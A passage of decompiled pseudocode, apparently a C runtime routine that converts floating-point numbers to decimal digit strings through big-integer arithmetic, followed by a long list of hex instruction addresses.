														_v1876 = _t1057;
														__eflags = _t838;
														if(_t838 != 0) {
															_v1892 = _v472;
														}
														_t1114 = 0;
														_t1214 = 0;
														_v1864 = 0;
														__eflags = _t1057;
														if(_t1057 == 0) {
															L243:
															_v472 = _t1114;
															_t840 = _t1114 << 2;
															__eflags = _t840;
															_push(_t840);
															_t841 =  &_v1860;
															goto L244;
														} else {
															_t1164 = _t1163 -  &_v1860;
															__eflags = _t1164;
															_v1928 = _t1164;
															do {
																_t847 =  *(_t1234 + _t1164 + _t1214 * 4 - 0x740);
																_v1896 = _t847;
																__eflags = _t847;
																if(_t847 != 0) {
																	_t848 = 0;
																	_t1165 = 0;
																	_t1058 = _t1214;
																	_v1888 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L240:
																		__eflags = _t1058 - 0x73;
																		if(_t1058 == 0x73) {
																			goto L258;
																		} else {
																			_t1164 = _v1928;
																			_t1057 = _v1876;
																			goto L242;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1058 - 0x73;
																			if(_t1058 == 0x73) {
																				goto L235;
																			}
																			__eflags = _t1058 - _t1114;
																			if(_t1058 == _t1114) {
																				 *(_t1234 + _t1058 * 4 - 0x740) =  *(_t1234 + _t1058 * 4 - 0x740) & 0x00000000;
																				_t859 = _t848 + 1 + _t1214;
																				__eflags = _t859;
																				_v1864 = _t859;
																				_t848 = _v1888;
																			}
																			_t854 =  *(_v1908 + _t848 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1234 + _t1058 * 4 - 0x740) =  *(_t1234 + _t1058 * 4 - 0x740) + _t854 * _v1896 + _t1165;
																			asm("adc edx, 0x0");
																			_t848 = _v1888 + 1;
																			_t1058 = _t1058 + 1;
																			_v1888 = _t848;
																			_t1165 = _t854 * _v1896 >> 0x20;
																			_t1114 = _v1864;
																			__eflags = _t848 - _v1892;
																			if(_t848 != _v1892) {
																				continue;
																			} else {
																				goto L235;
																			}
																			while(1) {
																				L235:
																				__eflags = _t1165;
																				if(_t1165 == 0) {
																					goto L240;
																				}
																				__eflags = _t1058 - 0x73;
																				if(_t1058 == 0x73) {
																					goto L258;
																				} else {
																					__eflags = _t1058 - _t1114;
																					if(_t1058 == _t1114) {
																						_t558 = _t1234 + _t1058 * 4 - 0x740;
																						 *_t558 =  *(_t1234 + _t1058 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t558;
																						_t564 = _t1058 + 1; // 0x1
																						_v1864 = _t564;
																					}
																					_t852 = _t1165;
																					_t1165 = 0;
																					 *(_t1234 + _t1058 * 4 - 0x740) =  *(_t1234 + _t1058 * 4 - 0x740) + _t852;
																					_t1114 = _v1864;
																					asm("adc edi, edi");
																					_t1058 = _t1058 + 1;
																					continue;
																				}
																				goto L246;
																			}
																			goto L240;
																		}
																		goto L235;
																	}
																} else {
																	__eflags = _t1214 - _t1114;
																	if(_t1214 == _t1114) {
																		 *(_t1234 + _t1214 * 4 - 0x740) =  *(_t1234 + _t1214 * 4 - 0x740) & _t847;
																		_t526 = _t1214 + 1; // 0x1
																		_t1114 = _t526;
																		_v1864 = _t1114;
																	}
																	goto L242;
																}
																goto L246;
																L242:
																_t1214 = _t1214 + 1;
																__eflags = _t1214 - _t1057;
															} while (_t1214 != _t1057);
															goto L243;
														}
													} else {
														_t1166 = _v468;
														_push(_t1057 << 2);
														_v472 = _t1057;
														_push( &_v1396);
														_push(_t1025);
														_push( &_v468);
														L313();
														_t1240 =  &(_t1240[4]);
														__eflags = _t1166;
														if(_t1166 == 0) {
															goto L203;
														} else {
															__eflags = _t1166 - 1;
															if(_t1166 == 1) {
																goto L245;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L245;
																} else {
																	_t1059 = 0;
																	_v1896 = _v472;
																	_t1215 = 0;
																	__eflags = 0;
																	do {
																		_t867 = _t1166;
																		_t1115 = _t867 *  *(_t1234 + _t1215 * 4 - 0x1d0) >> 0x20;
																		 *(_t1234 + _t1215 * 4 - 0x1d0) = _t867 *  *(_t1234 + _t1215 * 4 - 0x1d0) + _t1059;
																		asm("adc edx, 0x0");
																		_t1215 = _t1215 + 1;
																		_t1059 = _t1115;
																		__eflags = _t1215 - _v1896;
																	} while (_t1215 != _v1896);
																	goto L208;
																}
															}
														}
													}
												} else {
													_t1167 = _v1396;
													__eflags = _t1167;
													if(_t1167 != 0) {
														__eflags = _t1167 - 1;
														if(_t1167 == 1) {
															goto L245;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L245;
															} else {
																_t1060 = 0;
																_v1896 = _v472;
																_t1216 = 0;
																__eflags = 0;
																do {
																	_t872 = _t1167;
																	_t1116 = _t872 *  *(_t1234 + _t1216 * 4 - 0x1d0) >> 0x20;
																	 *(_t1234 + _t1216 * 4 - 0x1d0) = _t872 *  *(_t1234 + _t1216 * 4 - 0x1d0) + _t1060;
																	asm("adc edx, 0x0");
																	_t1216 = _t1216 + 1;
																	_t1060 = _t1116;
																	__eflags = _t1216 - _v1896;
																} while (_t1216 != _v1896);
																L208:
																__eflags = _t1059;
																if(_t1059 == 0) {
																	goto L245;
																} else {
																	_t870 = _v472;
																	__eflags = _t870 - 0x73;
																	if(_t870 >= 0x73) {
																		L258:
																		_push(0);
																		_v2408 = 0;
																		_v472 = 0;
																		_push( &_v2404);
																		_push(_t1025);
																		_push( &_v468);
																		L313();
																		_t1240 =  &(_t1240[4]);
																		_t843 = 0;
																	} else {
																		 *(_t1234 + _t870 * 4 - 0x1d0) = _t1059;
																		_v472 = _v472 + 1;
																		goto L245;
																	}
																}
															}
														}
													} else {
														L203:
														_v2408 = 0;
														_v472 = 0;
														_push(0);
														_t841 =  &_v2404;
														L244:
														_push(_t841);
														_push(_t1025);
														_push( &_v468);
														L313();
														_t1240 =  &(_t1240[4]);
														L245:
														_t843 = 1;
													}
												}
												L246:
												__eflags = _t843;
												if(_t843 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L261:
													_push( &_v2404);
													_t823 =  &_v468;
													goto L262;
												} else {
													goto L247;
												}
												goto L263;
												L247:
												_t784 = _v1880 - _v1872;
												__eflags = _t784;
												_v1880 = _t784;
											} while (_t784 != 0);
											_t1044 = _v1884;
											goto L249;
										}
									} else {
										_t875 = _t782 / _t1043;
										_v1908 = _t875;
										_t1061 = _t782 % _t1043;
										_v1896 = _t1061;
										__eflags = _t875;
										if(_t875 == 0) {
											L184:
											__eflags = _t1061;
											if(_t1061 != 0) {
												_t1168 =  *(0x73414 + _t1061 * 4);
												__eflags = _t1168;
												if(_t1168 != 0) {
													__eflags = _t1168 - 1;
													if(_t1168 != 1) {
														_t876 = _v936;
														_v1896 = _t876;
														__eflags = _t876;
														if(_t876 != 0) {
															_t1217 = 0;
															_t1062 = 0;
															__eflags = 0;
															do {
																_t877 = _t1168;
																_t1120 = _t877 *  *(_t1234 + _t1062 * 4 - 0x3a0) >> 0x20;
																 *(_t1234 + _t1062 * 4 - 0x3a0) = _t877 *  *(_t1234 + _t1062 * 4 - 0x3a0) + _t1217;
																asm("adc edx, 0x0");
																_t1062 = _t1062 + 1;
																_t1217 = _t1120;
																__eflags = _t1062 - _v1896;
															} while (_t1062 != _v1896);
															__eflags = _t1217;
															if(_t1217 != 0) {
																_t880 = _v936;
																__eflags = _t880 - 0x73;
																if(_t880 >= 0x73) {
																	goto L186;
																} else {
																	 *(_t1234 + _t880 * 4 - 0x3a0) = _t1217;
																	_v936 = _v936 + 1;
																}
															}
														}
													}
												} else {
													L186:
													_v2408 = 0;
													_v936 = 0;
													_push(0);
													goto L190;
												}
											}
										} else {
											do {
												__eflags = _t875 - 0x26;
												if(_t875 > 0x26) {
													_t875 = 0x26;
												}
												_t1063 =  *(0x7337e + _t875 * 4) & 0x000000ff;
												_v1888 = _t875;
												_v1400 = ( *(0x7337e + _t875 * 4) & 0x000000ff) + ( *(0x7337f + _t875 * 4) & 0x000000ff);
												E0003F670(_t1063 << 2,  &_v1396, 0, _t1063 << 2);
												_t893 = E0003F0F0( &(( &_v1396)[_t1063]), 0x72a78 + ( *(0x7337c + _v1888 * 4) & 0x0000ffff) * 4, ( *(0x7337f + _t875 * 4) & 0x000000ff) << 2);
												_t1064 = _v1400;
												_t1240 =  &(_t1240[6]);
												_v1892 = _t1064;
												__eflags = _t1064 - 1;
												if(_t1064 > 1) {
													__eflags = _v936 - 1;
													if(_v936 > 1) {
														__eflags = _t1064 - _v936;
														_t1171 =  &_v1396;
														_t894 = _t893 & 0xffffff00 | _t1064 - _v936 > 0x00000000;
														__eflags = _t894;
														if(_t894 != 0) {
															_t1121 =  &_v932;
														} else {
															_t1171 =  &_v932;
															_t1121 =  &_v1396;
														}
														_v1876 = _t1121;
														__eflags = _t894;
														if(_t894 == 0) {
															_t1064 = _v936;
														}
														_v1880 = _t1064;
														__eflags = _t894;
														if(_t894 != 0) {
															_v1892 = _v936;
														}
														_t1122 = 0;
														_t1219 = 0;
														_v1864 = 0;
														__eflags = _t1064;
														if(_t1064 == 0) {
															L177:
															_v936 = _t1122;
															_t896 = _t1122 << 2;
															__eflags = _t896;
															goto L178;
														} else {
															_t1172 = _t1171 -  &_v1860;
															__eflags = _t1172;
															_v1928 = _t1172;
															do {
																_t903 =  *(_t1234 + _t1172 + _t1219 * 4 - 0x740);
																_v1884 = _t903;
																__eflags = _t903;
																if(_t903 != 0) {
																	_t904 = 0;
																	_t1173 = 0;
																	_t1065 = _t1219;
																	_v1872 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L174:
																		__eflags = _t1065 - 0x73;
																		if(_t1065 == 0x73) {
																			goto L187;
																		} else {
																			_t1172 = _v1928;
																			_t1064 = _v1880;
																			goto L176;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1065 - 0x73;
																			if(_t1065 == 0x73) {
																				goto L169;
																			}
																			__eflags = _t1065 - _t1122;
																			if(_t1065 == _t1122) {
																				 *(_t1234 + _t1065 * 4 - 0x740) =  *(_t1234 + _t1065 * 4 - 0x740) & 0x00000000;
																				_t915 = _t904 + 1 + _t1219;
																				__eflags = _t915;
																				_v1864 = _t915;
																				_t904 = _v1872;
																			}
																			_t910 =  *(_v1876 + _t904 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1234 + _t1065 * 4 - 0x740) =  *(_t1234 + _t1065 * 4 - 0x740) + _t910 * _v1884 + _t1173;
																			asm("adc edx, 0x0");
																			_t904 = _v1872 + 1;
																			_t1065 = _t1065 + 1;
																			_v1872 = _t904;
																			_t1173 = _t910 * _v1884 >> 0x20;
																			_t1122 = _v1864;
																			__eflags = _t904 - _v1892;
																			if(_t904 != _v1892) {
																				continue;
																			} else {
																				goto L169;
																			}
																			while(1) {
																				L169:
																				__eflags = _t1173;
																				if(_t1173 == 0) {
																					goto L174;
																				}
																				__eflags = _t1065 - 0x73;
																				if(_t1065 == 0x73) {
																					L187:
																					__eflags = 0;
																					_v2408 = 0;
																					_v936 = 0;
																					_push(0);
																					_t906 =  &_v2404;
																					goto L188;
																				} else {
																					__eflags = _t1065 - _t1122;
																					if(_t1065 == _t1122) {
																						_t370 = _t1234 + _t1065 * 4 - 0x740;
																						 *_t370 =  *(_t1234 + _t1065 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t370;
																						_t376 = _t1065 + 1; // 0x1
																						_v1864 = _t376;
																					}
																					_t908 = _t1173;
																					_t1173 = 0;
																					 *(_t1234 + _t1065 * 4 - 0x740) =  *(_t1234 + _t1065 * 4 - 0x740) + _t908;
																					_t1122 = _v1864;
																					asm("adc edi, edi");
																					_t1065 = _t1065 + 1;
																					continue;
																				}
																				goto L181;
																			}
																			goto L174;
																		}
																		goto L169;
																	}
																} else {
																	__eflags = _t1219 - _t1122;
																	if(_t1219 == _t1122) {
																		 *(_t1234 + _t1219 * 4 - 0x740) =  *(_t1234 + _t1219 * 4 - 0x740) & _t903;
																		_t338 = _t1219 + 1; // 0x1
																		_t1122 = _t338;
																		_v1864 = _t1122;
																	}
																	goto L176;
																}
																goto L181;
																L176:
																_t1219 = _t1219 + 1;
																__eflags = _t1219 - _t1064;
															} while (_t1219 != _t1064);
															goto L177;
														}
													} else {
														_t1174 = _v932;
														_push(_t1064 << 2);
														_v936 = _t1064;
														_push( &_v1396);
														_push(_t1025);
														_push( &_v932);
														L313();
														_t1240 =  &(_t1240[4]);
														__eflags = _t1174;
														if(_t1174 != 0) {
															__eflags = _t1174 - 1;
															if(_t1174 == 1) {
																goto L180;
															} else {
																__eflags = _v936;
																if(_v936 == 0) {
																	goto L180;
																} else {
																	_t1066 = 0;
																	_v1884 = _v936;
																	_t1220 = 0;
																	__eflags = 0;
																	do {
																		_t922 = _t1174;
																		_t1123 = _t922 *  *(_t1234 + _t1220 * 4 - 0x3a0) >> 0x20;
																		 *(_t1234 + _t1220 * 4 - 0x3a0) = _t922 *  *(_t1234 + _t1220 * 4 - 0x3a0) + _t1066;
																		asm("adc edx, 0x0");
																		_t1220 = _t1220 + 1;
																		_t1066 = _t1123;
																		__eflags = _t1220 - _v1884;
																	} while (_t1220 != _v1884);
																	goto L149;
																}
															}
														} else {
															_v1400 = 0;
															_v936 = 0;
															_push(0);
															_t897 =  &_v1396;
															goto L179;
														}
													}
												} else {
													_t1175 = _v1396;
													__eflags = _t1175;
													if(_t1175 != 0) {
														__eflags = _t1175 - 1;
														if(_t1175 == 1) {
															goto L180;
														} else {
															__eflags = _v936;
															if(_v936 == 0) {
																goto L180;
															} else {
																_t1067 = 0;
																_v1884 = _v936;
																_t1221 = 0;
																__eflags = 0;
																do {
																	_t929 = _t1175;
																	_t1124 = _t929 *  *(_t1234 + _t1221 * 4 - 0x3a0) >> 0x20;
																	 *(_t1234 + _t1221 * 4 - 0x3a0) = _t929 *  *(_t1234 + _t1221 * 4 - 0x3a0) + _t1067;
																	asm("adc edx, 0x0");
																	_t1221 = _t1221 + 1;
																	_t1067 = _t1124;
																	__eflags = _t1221 - _v1884;
																} while (_t1221 != _v1884);
																L149:
																__eflags = _t1066;
																if(_t1066 == 0) {
																	goto L180;
																} else {
																	_t925 = _v936;
																	__eflags = _t925 - 0x73;
																	if(_t925 < 0x73) {
																		 *(_t1234 + _t925 * 4 - 0x3a0) = _t1066;
																		_v936 = _v936 + 1;
																		goto L180;
																	} else {
																		_v1400 = 0;
																		_v936 = 0;
																		_push(0);
																		_t906 =  &_v1396;
																		L188:
																		_push(_t906);
																		_push(_t1025);
																		_push( &_v932);
																		L313();
																		_t1240 =  &(_t1240[4]);
																		_t899 = 0;
																	}
																}
															}
														}
													} else {
														_t896 = 0;
														_v1864 = 0;
														_v936 = 0;
														L178:
														_push(_t896);
														_t897 =  &_v1860;
														L179:
														_push(_t897);
														_push(_t1025);
														_push( &_v932);
														L313();
														_t1240 =  &(_t1240[4]);
														L180:
														_t899 = 1;
													}
												}
												L181:
												__eflags = _t899;
												if(_t899 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_t404 =  &_v936;
													 *_t404 = _v936 & 0x00000000;
													__eflags =  *_t404;
													_push(0);
													L190:
													_push( &_v2404);
													_t823 =  &_v932;
													L262:
													_push(_t1025);
													_push(_t823);
													L313();
													_t1240 =  &(_t1240[4]);
												} else {
													goto L182;
												}
												goto L263;
												L182:
												_t875 = _v1908 - _v1888;
												__eflags = _t875;
												_v1908 = _t875;
											} while (_t875 != 0);
											_t1061 = _v1896;
											goto L184;
										}
									}
									L263:
									_t1155 = _v1920;
									_t1207 = _t1155;
									_t1045 = _v472;
									_v1872 = _t1207;
									__eflags = _t1045;
									if(_t1045 != 0) {
										_t1211 = 0;
										_t1159 = 0;
										__eflags = 0;
										do {
											_t813 =  *(_t1234 + _t1159 * 4 - 0x1d0);
											_t1110 = 0xa;
											_t1111 = _t813 * _t1110 >> 0x20;
											 *(_t1234 + _t1159 * 4 - 0x1d0) = _t813 * _t1110 + _t1211;
											asm("adc edx, 0x0");
											_t1159 = _t1159 + 1;
											_t1211 = _t1111;
											__eflags = _t1159 - _t1045;
										} while (_t1159 != _t1045);
										_v1896 = _t1211;
										__eflags = _t1211;
										_t1207 = _v1872;
										if(_t1211 != 0) {
											_t1054 = _v472;
											__eflags = _t1054 - 0x73;
											if(_t1054 >= 0x73) {
												__eflags = 0;
												_push(0);
												_v2408 = 0;
												_v472 = 0;
												_push( &_v2404);
												_push(_t1025);
												_push( &_v468);
												L313();
												_t1240 =  &(_t1240[4]);
											} else {
												 *(_t1234 + _t1054 * 4 - 0x1d0) = _t1111;
												_v472 = _v472 + 1;
											}
										}
										_t1155 = _t1207;
									}
									_t787 = E0004A3B0( &_v472,  &_v936);
									_t1101 = 0xa;
									__eflags = _t787 - _t1101;
									if(_t787 != _t1101) {
										__eflags = _t787;
										if(_t787 != 0) {
											_t788 = _t787 + 0x30;
											__eflags = _t788;
											_t1207 = _t1155 + 1;
											 *_t1155 = _t788;
											_v1872 = _t1207;
											goto L282;
										} else {
											_t789 = _v1904 - 1;
										}
									} else {
										_v1904 = _v1904 + 1;
										_t1207 = _t1155 + 1;
										_t805 = _v936;
										 *_t1155 = 0x31;
										_v1872 = _t1207;
										__eflags = _t805;
										if(_t805 != 0) {
											_t1158 = 0;
											_t1210 = _t805;
											_t1053 = 0;
											__eflags = 0;
											do {
												_t806 =  *(_t1234 + _t1053 * 4 - 0x3a0);
												 *(_t1234 + _t1053 * 4 - 0x3a0) = _t806 * _t1101 + _t1158;
												asm("adc edx, 0x0");
												_t1053 = _t1053 + 1;
												_t1158 = _t806 * _t1101 >> 0x20;
												_t1101 = 0xa;
												__eflags = _t1053 - _t1210;
											} while (_t1053 != _t1210);
											_t1207 = _v1872;
											__eflags = _t1158;
											if(_t1158 != 0) {
												_t809 = _v936;
												__eflags = _t809 - 0x73;
												if(_t809 >= 0x73) {
													_push(0);
													_v2408 = 0;
													_v936 = 0;
													_push( &_v2404);
													_push(_t1025);
													_push( &_v932);
													L313();
													_t1240 =  &(_t1240[4]);
												} else {
													 *(_t1234 + _t809 * 4 - 0x3a0) = _t1158;
													_v936 = _v936 + 1;
												}
											}
										}
										L282:
										_t789 = _v1904;
									}
									 *((intOrPtr*)(_v1924 + 4)) = _t789;
									_t1031 = _v1916;
									__eflags = _t789;
									if(_t789 >= 0) {
										__eflags = _t1031 - 0x7fffffff;
										if(_t1031 <= 0x7fffffff) {
											_t1031 = _t1031 + _t789;
											__eflags = _t1031;
										}
									}
									_t791 = _a24 - 1;
									__eflags = _t791 - _t1031;
									if(_t791 >= _t1031) {
										_t791 = _t1031;
									}
									_t792 = _t791 + _v1920;
									_v1916 = _t792;
									__eflags = _t1207 - _t792;
									if(__eflags != 0) {
										while(1) {
											_t793 = _v472;
											__eflags = _t793;
											if(__eflags == 0) {
												goto L303;
											}
											_t1156 = 0;
											_t1208 = _t793;
											_t1049 = 0;
											__eflags = 0;
											do {
												_t794 =  *(_t1234 + _t1049 * 4 - 0x1d0);
												 *(_t1234 + _t1049 * 4 - 0x1d0) = _t794 * 0x3b9aca00 + _t1156;
												asm("adc edx, 0x0");
												_t1049 = _t1049 + 1;
												_t1156 = _t794 * 0x3b9aca00 >> 0x20;
												__eflags = _t1049 - _t1208;
											} while (_t1049 != _t1208);
											_t1209 = _v1872;
											__eflags = _t1156;
											if(_t1156 != 0) {
												_t800 = _v472;
												__eflags = _t800 - 0x73;
												if(_t800 >= 0x73) {
													__eflags = 0;
													_push(0);
													_v2408 = 0;
													_v472 = 0;
													_push( &_v2404);
													_push(_t1025);
													_push( &_v468);
													L313();
													_t1240 =  &(_t1240[4]);
												} else {
													 *(_t1234 + _t800 * 4 - 0x1d0) = _t1156;
													_v472 = _v472 + 1;
												}
											}
											_t799 = E0004A3B0( &_v472,  &_v936);
											_t1157 = 8;
											_t1031 = _v1916 - _t1209;
											__eflags = _t1031;
											do {
												_t708 = _t799 % _v1912;
												_t799 = _t799 / _v1912;
												_t1101 = _t708 + 0x30;
												__eflags = _t1031 - _t1157;
												if(_t1031 >= _t1157) {
													 *(_t1157 + _t1209) = _t1101;
												}
												_t1157 = _t1157 - 1;
												__eflags = _t1157 - 0xffffffff;
											} while (_t1157 != 0xffffffff);
											__eflags = _t1031 - 9;
											if(_t1031 > 9) {
												_t1031 = 9;
											}
											_t1207 = _t1209 + _t1031;
											_v1872 = _t1207;
											__eflags = _t1207 - _v1916;
											if(__eflags != 0) {
												continue;
											}
											goto L303;
										}
									}
									L303:
									 *_t1207 = 0;
									goto L309;
								}
							}
						}
					}
				} else {
					_t1031 = _t1195 & 0x000fffff;
					if((_t1145 | _t1195 & 0x000fffff) != 0) {
						goto L5;
					} else {
						_push(0x7343c);
						 *((intOrPtr*)(_v1924 + 4)) =  *(_v1924 + 4) & 0x00000000;
						L308:
						_push(_a24);
						_push(_t1016);
						if(E000451A2() != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00043D8A();
							asm("int3");
							_push(_t1234);
							_push(_t1195);
							_t1196 = _v2424;
							__eflags = _t1196;
							if(_t1196 != 0) {
								_t740 = _v0;
								__eflags = _t740;
								if(_t740 != 0) {
									_push(_t1145);
									_t1146 = _a8;
									__eflags = _t1146;
									if(_t1146 == 0) {
										L320:
										E0003F670(_t1146, _t740, 0, _a4);
										__eflags = _t1146;
										if(_t1146 != 0) {
											__eflags = _a4 - _t1196;
											if(_a4 >= _t1196) {
												_t742 = 0x16;
											} else {
												_t743 = E00043E36();
												_push(0x22);
												goto L324;
											}
										} else {
											_t743 = E00043E36();
											_push(0x16);
											L324:
											_pop(_t1198);
											 *_t743 = _t1198;
											E00043D7A();
											_t742 = _t1198;
										}
									} else {
										__eflags = _a4 - _t1196;
										if(_a4 < _t1196) {
											goto L320;
										} else {
											E0003F0F0(_t740, _t1146, _t1196);
											_t742 = 0;
										}
									}
								} else {
									_t746 = E00043E36();
									_t1199 = 0x16;
									 *_t746 = _t1199;
									E00043D7A();
									_t742 = _t1199;
								}
							} else {
								_t742 = 0;
							}
							return _t742;
						} else {
							L309:
							_t1247 = _v1936;
							_pop(_t1148);
							_pop(_t1200);
							_pop(_t1017);
							if(_v1936 != 0) {
								E0004C6AE(_t1031, _t1247,  &_v1944);
							}
							return E0003DE36(_t1017, _v8 ^ _t1234, _t1101, _t1148, _t1200);
						}
					}
				}
			}




































































































































































































































































                                                                          0x0004a85e
                                                                          0x0004a869
                                                                          0x0004a870
                                                                          0x0004a873
                                                                          0x0004a874
                                                                          0x0004a87f
                                                                          0x0004a882
                                                                          0x0004a888
                                                                          0x0004a88e
                                                                          0x0004a893
                                                                          0x0004a8a2
                                                                          0x0004a8a4
                                                                          0x0004a8a6
                                                                          0x0004a8a6
                                                                          0x0004a8ad
                                                                          0x0004a8b7
                                                                          0x0004a8bc
                                                                          0x0004a8bf
                                                                          0x0004a8e3
                                                                          0x0004a8e7
                                                                          0x0004a8ec
                                                                          0x0004a8ed
                                                                          0x0004a8ef
                                                                          0x0004a8f1
                                                                          0x0004a8f7
                                                                          0x0004a8f7
                                                                          0x0004a8fe
                                                                          0x0004a8fe
                                                                          0x0004a901
                                                                          0x0004bbb1
                                                                          0x00000000
                                                                          0x0004a907
                                                                          0x0004a907
                                                                          0x0004a907
                                                                          0x0004a90a
                                                                          0x0004bbaa
                                                                          0x00000000
                                                                          0x0004a910
                                                                          0x0004a910
                                                                          0x0004a910
                                                                          0x0004a913
                                                                          0x0004bba3
                                                                          0x00000000
                                                                          0x0004a919
                                                                          0x0004a919
                                                                          0x0004a91c
                                                                          0x0004bb9c
                                                                          0x00000000
                                                                          0x0004a922
                                                                          0x0004a92b
                                                                          0x0004a933
                                                                          0x0004a936
                                                                          0x0004a939
                                                                          0x0004a93c
                                                                          0x0004a942
                                                                          0x0004a94a
                                                                          0x0004a950
                                                                          0x0004a95a
                                                                          0x0004a95a
                                                                          0x0004a95d
                                                                          0x0004a965
                                                                          0x0004a96c
                                                                          0x0004a96c
                                                                          0x0004a95f
                                                                          0x0004a95f
                                                                          0x0004a961
                                                                          0x0004a974
                                                                          0x0004a97a
                                                                          0x0004a97c
                                                                          0x0004a980
                                                                          0x0004a985
                                                                          0x0004a992
                                                                          0x0004a994
                                                                          0x0004a99a
                                                                          0x0004a99f
                                                                          0x0004a9a0
                                                                          0x0004a9a1
                                                                          0x0004a9ab
                                                                          0x0004a9b0
                                                                          0x0004a9b6
                                                                          0x0004a9bb
                                                                          0x0004a9c4
                                                                          0x0004a9c4
                                                                          0x0004a9c6
                                                                          0x0004a9bd
                                                                          0x0004a9bd
                                                                          0x0004a9c2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004a9c2
                                                                          0x0004a9cc
                                                                          0x0004a9d4
                                                                          0x0004a9d6
                                                                          0x0004a9df
                                                                          0x0004a9e0
                                                                          0x0004a9e6
                                                                          0x0004a9e8
                                                                          0x0004addb
                                                                          0x0004ade1
                                                                          0x0004af00
                                                                          0x0004af00
                                                                          0x0004af07
                                                                          0x0004af07
                                                                          0x0004af07
                                                                          0x0004af0e
                                                                          0x0004af11
                                                                          0x0004af18
                                                                          0x0004af18
                                                                          0x0004af13
                                                                          0x0004af13
                                                                          0x0004af13
                                                                          0x0004af1c
                                                                          0x0004af1d
                                                                          0x0004af1f
                                                                          0x0004af22
                                                                          0x0004af25
                                                                          0x0004af28
                                                                          0x0004af2e
                                                                          0x0004af31
                                                                          0x0004af34
                                                                          0x0004af3e
                                                                          0x0004af3e
                                                                          0x0004af3e
                                                                          0x0004af36
                                                                          0x0004af36
                                                                          0x0004af38
                                                                          0x00000000
                                                                          0x0004af3a
                                                                          0x0004af3a
                                                                          0x0004af3a
                                                                          0x0004af38
                                                                          0x0004af40
                                                                          0x0004af42
                                                                          0x0004afe3
                                                                          0x0004afe3
                                                                          0x0004aff0
                                                                          0x0004aff0
                                                                          0x0004aff0
                                                                          0x0004aff7
                                                                          0x0004aff9
                                                                          0x0004b000
                                                                          0x0004b005
                                                                          0x0004b006
                                                                          0x0004b00b
                                                                          0x0004af48
                                                                          0x0004af48
                                                                          0x0004af4a
                                                                          0x00000000
                                                                          0x0004af50
                                                                          0x0004af52
                                                                          0x0004af53
                                                                          0x0004af55
                                                                          0x0004af57
                                                                          0x0004af57
                                                                          0x0004af59
                                                                          0x0004af5c
                                                                          0x0004af64
                                                                          0x0004af66
                                                                          0x0004af69
                                                                          0x0004af6f
                                                                          0x0004af6f
                                                                          0x0004af71
                                                                          0x0004af7d
                                                                          0x0004af7d
                                                                          0x0004af7d
                                                                          0x0004af73
                                                                          0x0004af75
                                                                          0x0004af75
                                                                          0x0004af84
                                                                          0x0004af87
                                                                          0x0004af89
                                                                          0x0004af90
                                                                          0x0004af90
                                                                          0x0004af8b
                                                                          0x0004af8b
                                                                          0x0004af8b
                                                                          0x0004af98
                                                                          0x0004afa2
                                                                          0x0004afa8
                                                                          0x0004afa9
                                                                          0x0004afae
                                                                          0x0004afb4
                                                                          0x0004afb7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004afb9
                                                                          0x0004afb9
                                                                          0x0004afc1
                                                                          0x0004afc1
                                                                          0x0004afc7
                                                                          0x0004afce
                                                                          0x0004afdb
                                                                          0x0004afd0
                                                                          0x0004afd0
                                                                          0x0004afd3
                                                                          0x0004afd3
                                                                          0x0004afce
                                                                          0x0004af4a
                                                                          0x0004b017
                                                                          0x0004b027
                                                                          0x0004b034
                                                                          0x0004b036
                                                                          0x0004b03d
                                                                          0x0004ade7
                                                                          0x0004ade7
                                                                          0x0004adf0
                                                                          0x0004adf1
                                                                          0x0004adfb
                                                                          0x0004ae01
                                                                          0x0004ae03
                                                                          0x0004ae09
                                                                          0x0004ae09
                                                                          0x0004ae0b
                                                                          0x0004ae0b
                                                                          0x0004ae12
                                                                          0x0004ae19
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004ae1f
                                                                          0x0004ae22
                                                                          0x0004ae25
                                                                          0x00000000
                                                                          0x0004ae27
                                                                          0x0004ae27
                                                                          0x0004ae27
                                                                          0x0004ae27
                                                                          0x0004ae2e
                                                                          0x0004ae31
                                                                          0x0004ae38
                                                                          0x0004ae38
                                                                          0x0004ae33
                                                                          0x0004ae33
                                                                          0x0004ae33
                                                                          0x0004ae3c
                                                                          0x0004ae3f
                                                                          0x0004ae41
                                                                          0x0004ae43
                                                                          0x0004ae49
                                                                          0x0004ae4f
                                                                          0x0004ae51
                                                                          0x0004ae51
                                                                          0x0004ae51
                                                                          0x0004ae58
                                                                          0x0004ae58
                                                                          0x0004ae5a
                                                                          0x0004ae66
                                                                          0x0004ae66
                                                                          0x0004ae66
                                                                          0x0004ae5c
                                                                          0x0004ae5e
                                                                          0x0004ae5e
                                                                          0x0004ae6d
                                                                          0x0004ae70
                                                                          0x0004ae72
                                                                          0x0004ae79
                                                                          0x0004ae79
                                                                          0x0004ae74
                                                                          0x0004ae74
                                                                          0x0004ae74
                                                                          0x0004ae81
                                                                          0x0004ae8c
                                                                          0x0004ae92
                                                                          0x0004ae93
                                                                          0x0004ae98
                                                                          0x0004ae9e
                                                                          0x0004aea1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004aea3
                                                                          0x0004aea3
                                                                          0x0004aead
                                                                          0x0004aeb8
                                                                          0x0004aec0
                                                                          0x0004aec6
                                                                          0x0004aed1
                                                                          0x0004aed7
                                                                          0x0004aede
                                                                          0x0004aef1
                                                                          0x0004aef8
                                                                          0x0004aef8
                                                                          0x00000000
                                                                          0x0004ae25
                                                                          0x0004ae0b
                                                                          0x00000000
                                                                          0x0004ae03
                                                                          0x0004b040
                                                                          0x0004b040
                                                                          0x0004b046
                                                                          0x0004b04b
                                                                          0x0004b051
                                                                          0x0004b051
                                                                          0x0004b054
                                                                          0x0004b05b
                                                                          0x0004b062
